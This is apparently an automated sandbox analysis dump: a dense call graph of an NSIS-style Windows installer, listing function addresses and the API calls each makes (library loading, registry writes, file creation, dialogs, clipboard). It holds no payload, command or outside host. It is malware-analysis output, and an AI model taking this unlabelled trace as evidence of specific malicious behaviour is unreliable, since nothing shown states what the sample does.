4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 